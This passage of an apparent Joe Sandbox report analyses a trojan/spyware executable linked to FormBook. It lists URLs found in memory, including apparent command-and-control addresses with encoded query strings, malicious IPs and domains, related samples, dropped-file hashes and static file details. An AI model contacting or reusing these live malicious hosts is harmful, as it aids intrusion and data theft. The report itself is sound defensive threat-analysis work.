                                                                                                http://www.fonts.comSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.urwpp.deDPleaseSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.zhongyicts.com.cnSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://pip1-loh.com/wPGxKDFwovcH.exe, 00000008.00000002.4134949822.00000000043FE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.sakkal.comSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://static.loopia.se/shared/images/additional-pages-hero-shape.webpfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://static.loopia.se/shared/style/2022-extra-pages.cssfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.fontbureau.comSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://static.loopia.se/responsive/images/iOS-114.pngfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.ultrawin23.shop/53y2/?NBfdCRyH=t/JS3aCWZhQCYNrIivg5/jofofdJ0Yd9fc.exe, 00000007.00000002.4135576349.00000000041EC000.00000004.10000000.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.00000000035DC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.ecosia.org/newtab/fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://static.loopia.se/responsive/styles/reset.cssfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.carterandcone.comlSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://ac.ecosia.org/autocomplete?q=fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://static.loopia.se/responsive/images/iOS-57.pngfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.founder.com.cn/cnSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.fontbureau.com/designers/frere-user.htmlSDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://papampalli.shop/pgru/?ZpEH9=TjSP5LXXbN8d4&NBfdCRyH=8wzvJ9lW3TiSQ8lhaQq226mj8n0YxlLcNHa9oMj7VFfc.exe, 00000007.00000002.4135576349.0000000004B58000.00000004.10000000.00040000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.0000000003F48000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.jiyu-kobo.co.jp/SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pafc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://www.fontbureau.com/designers8SDBARVe3d3.exe, 00000000.00000002.1695902608.00000000072C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pafc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000007.00000002.4137604928.0000000007B98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pafc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebfc.exe, 00000007.00000002.4135576349.000000000405A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000007.00000002.4137441460.00000000060A0000.00000004.00000800.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4134949822.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  13.248.169.48
                                                                                                                                  		www.sonoscan.orgUnited States
                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                  91.184.0.200
                                                                                                                                  		kantinestoel.onlineNetherlands
                                                                                                                                  		197902HOSTNETNLtrue
                                                                                                                                  194.9.94.85
                                                                                                                                  		www.deeplungatlas.orgSweden
                                                                                                                                  		39570LOOPIASEtrue
                                                                                                                                  167.172.133.32
                                                                                                                                  		www.omnibizlux.bizUnited States
                                                                                                                                  		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                  188.114.97.3
                                                                                                                                  		www.dodsrprolev.shopEuropean Union
                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                  38.47.232.194
                                                                                                                                  		zz67x.topUnited States
                                                                                                                                  		174COGENT-174UStrue
                                                                                                                                  162.0.211.143
                                                                                                                                  		www.vibixx.siteCanada
                                                                                                                                  		35893ACPCAtrue
                                                                                                                                  85.159.66.93
                                                                                                                                  		natroredirect.natrocdn.comTurkey
                                                                                                                                  		34619CIZGITRfalse
                                                                                                                                  3.33.130.190
                                                                                                                                  		smileyface.worldUnited States
                                                                                                                                  		8987AMAZONEXPANSIONGBtrue
                                                                                                                                  170.39.213.43
                                                                                                                                  		ultrawin23.shopReserved
                                                                                                                                  		139776PETRONAS-BHD-AS-APPetroliamNasionalBerhadMYtrue
                                                                                                                                  104.21.64.124
                                                                                                                                  		www.gokulmohan.onlineUnited States
                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                  162.241.85.94
                                                                                                                                  		papampalli.shopUnited States
                                                                                                                                  		26337OIS1UStrue

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1551048
                                                                                                                                  Start date and time:2024-11-07 12:51:10 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 10m 44s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:9
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:2
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:SDBARVe3d3.exe
                                                                                                                                  renamed because original name is a hash value
                                                                                                                                  Original Sample Name:15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@16/12
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 75%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 90%
                                                                                                                                  • Number of executed functions: 93
                                                                                                                                  • Number of non-executed functions: 277
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                  • VT rate limit hit for: SDBARVe3d3.exe

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  06:52:01API Interceptor2x Sleep call for process: SDBARVe3d3.exe modified
                                                                                                                                  06:53:16API Interceptor9381821x Sleep call for process: fc.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  13.248.169.483NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.solidarity.rocks/hezo/
                                                                                                                                  FzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.virtu.industries/uln2/
                                                                                                                                  Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.telforce.one/ykhz/
                                                                                                                                  icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.ulula.org/4w1b/
                                                                                                                                  IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.ila.beauty/izfe/
                                                                                                                                  p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.notepad.mobi/zut6/?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8
                                                                                                                                  r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.polarmuseum.info/9u26/
                                                                                                                                  MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.ipk.app/phav/
                                                                                                                                  New Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                  • www.virtu.industries/i9b0/
                                                                                                                                  A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.thesquare.world/f1ri/
                                                                                                                                  91.184.0.200rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.aquaria.lease/xoeu/
                                                                                                                                  fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/ikh0/
                                                                                                                                  jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/ikh0/
                                                                                                                                  CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/ikh0/
                                                                                                                                  CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/ikh0/
                                                                                                                                  Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/ikh0/
                                                                                                                                  PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/ikh0/
                                                                                                                                  FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/hxxx/
                                                                                                                                  PASU5160894680 DOCS.scr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/c85h/
                                                                                                                                  PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • www.jobworklanka.online/ikh0/

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  www.dodsrprolev.shopWARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • 104.21.58.21
                                                                                                                                  natroredirect.natrocdn.comWc7HGBGZfE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  8aOelwlAyx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  Quote_General_Tech_LLC_637673,PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  PO 45003516.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  P1 BOL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 85.159.66.93
                                                                                                                                  www.gokulmohan.onlineDHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 172.67.185.22
                                                                                                                                  DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 172.67.185.22
                                                                                                                                  FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  • 104.21.64.124

                                                                                                                                  ASNs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  DIGITALOCEAN-ASNUSbin.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 206.189.186.142
                                                                                                                                  lB5MFPhwRY.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                  • 45.55.195.200
                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 167.99.235.203
                                                                                                                                  https://sites.google.com/view/ca7k/homeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 138.68.75.10
                                                                                                                                  2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                  • 64.225.91.73
                                                                                                                                  yakuza.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 206.189.77.126
                                                                                                                                  t5wABtnQtb.jsGet hashmaliciousUnknownBrowse
                                                                                                                                  • 46.101.25.30
                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 64.227.17.224
                                                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 64.227.17.224
                                                                                                                                  2va9zrsXLd.exeGet hashmaliciousRemcosBrowse
                                                                                                                                  • 206.189.218.238
                                                                                                                                  AMAZON-02US3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 76.223.105.230
                                                                                                                                  https://sendspace.com/pro/z42su8Get hashmaliciousMamba2FABrowse
                                                                                                                                  • 18.245.31.5
                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                  • 3.170.115.57
                                                                                                                                  assailant.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                  • 54.171.230.55
                                                                                                                                  bin.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 34.210.146.241
                                                                                                                                  bin.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 54.230.74.218
                                                                                                                                  sora.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 63.34.86.27
                                                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.171.230.55
                                                                                                                                  https://worldpay.merchant-dispute.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 3.160.150.119
                                                                                                                                  sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 65.11.83.73
                                                                                                                                  HOSTNETNLDHL Express Doc 01143124.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  fJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  https://polidos.com/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 91.184.0.111
                                                                                                                                  CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 91.184.0.200
                                                                                                                                  LOOPIASEhttp://tokenpuzz1le.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                  • 194.9.94.86
                                                                                                                                  Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  proforma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  shipping documents.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  MV Sunshine, ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  PAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  http://tok2np0cklt.top/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  docs_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85
                                                                                                                                  TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                  • 194.9.94.85

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  No context

                                                                                                                                  Created / dropped Files

                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SDBARVe3d3.exe.log

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\SDBARVe3d3.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1216
                                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                  Malicious:true
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                  C:\Users\user\AppData\Local\Temp\0349A-n

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\fc.exe
                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):114688
                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  Static File Info

                                                                                                                                  General

                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Entropy (8bit):7.9806492585011055
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                  File name:SDBARVe3d3.exe
                                                                                                                                  File size:678'400 bytes
                                                                                                                                  MD5:b6e0fb667376ccebddaf47c6d4432472
                                                                                                                                  SHA1:f596c7e6c1bf8af55b744ef512fdbaa44c75b876
                                                                                                                                  SHA256:15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103
                                                                                                                                  SHA512:52789ef3fc7c83010b50af3e2db03c0e0ffbfa64e37709f72ab99ce583acf98cc5c15bf28e7ce6a95dcbb29df772752fb4e37be90d53c5ea6b47156b731b84d5
                                                                                                                                  SSDEEP:12288:O1RveBYT8JXCvb3oFtC37Fg1eRypHnobqCdA47IvDxmsVM3EULFayQpyBNsel:O1RWBY41CTI4+ssEovDUGCE6FayQpAN7
